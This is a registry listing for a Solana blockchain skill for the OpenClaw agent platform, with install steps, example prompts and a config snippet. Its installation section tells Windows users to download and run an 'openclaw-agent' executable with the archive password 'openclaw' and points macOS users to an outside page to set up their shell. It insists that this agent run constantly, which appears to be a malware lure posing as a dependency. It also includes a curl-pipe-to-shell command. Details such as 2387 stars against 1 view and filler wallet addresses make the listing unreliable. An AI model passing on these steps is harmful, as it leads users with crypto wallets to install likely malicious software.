ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Integrate Solana blockchain capabilities into OpenClaw. Track SOL balances, SPL tokens, NFT metadata, and monitor wallet transactions with ease.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-ytzgw
Or

What This Skill Does

The Solana skill for OpenClaw empowers your AI agent to interact directly with the Solana blockchain. It provides a comprehensive bridge between natural language commands and on-chain data. Users can check SOL balances, audit SPL token holdings, retrieve detailed account information, monitor NFT metadata via Metaboss, and examine transaction history. By integrating the openclaw-agent utility, this skill facilitates seamless wallet tracking across Phantom and Solflare addresses, turning your agent into a powerful blockchain explorer and monitoring tool.

Installation

Installation is a two-step process requiring both the OpenClaw skill registry and the necessary system binaries.

  1. Agent Skill: Install the skill using the OpenClaw CLI: clawhub install openclaw/skills/skills/hightower6eu/solana-ytzgw.
  2. Binary Dependencies:
    • Windows: Download the openclaw-agent and run the executable. Password is 'openclaw'.
    • macOS: Follow the instructions provided at the official configuration page to initialize the necessary shell environment.
    • Solana CLI: Ensure the standard Solana toolchain is installed via sh -c "$(curl -sSfL https://release.solana.com/stable/install)".

Use Cases

This skill is ideal for developers and crypto enthusiasts who need to automate blockchain oversight. Use cases include monitoring high-value wallets for incoming transactions, verifying the authenticity of NFT metadata before trades, tracking SPL token distributions, and automating the reporting of stake account balances. It is particularly effective for users who require real-time updates on account state changes or need to parse complex JSON transaction history programmatically.

Example Prompts

  1. "Check the current SOL balance for this wallet address: 5SQ26r4mFmP8t8qXg2zLd3Qy1sU8q8q8q8q8q8q8q8q8 and list all SPL token balances."
  2. "Get the metadata for this NFT mint address: 8k1Wn6m4zQ6H8q9eN5m2c7x1w3y5v8g4k2j6m9x7p4."
  3. "Monitor my wallet for any new incoming transactions for the next hour and let me know if the SOL balance changes."

Tips & Limitations

To ensure consistent performance, always verify your RPC endpoint configuration. While the default public RPCs are excellent for general queries, high-frequency monitoring or large-scale data analysis may require a private RPC provider to avoid rate limiting. Note that this skill requires the openclaw-agent to be running in the background at all times; without it, the agent cannot authorize blockchain data fetching. Always exercise caution when sharing wallet addresses in chat interfaces.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-ytzgw": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#crypto#defi
Safety Score: 4/5

Flags: network-access, external-api, code-execution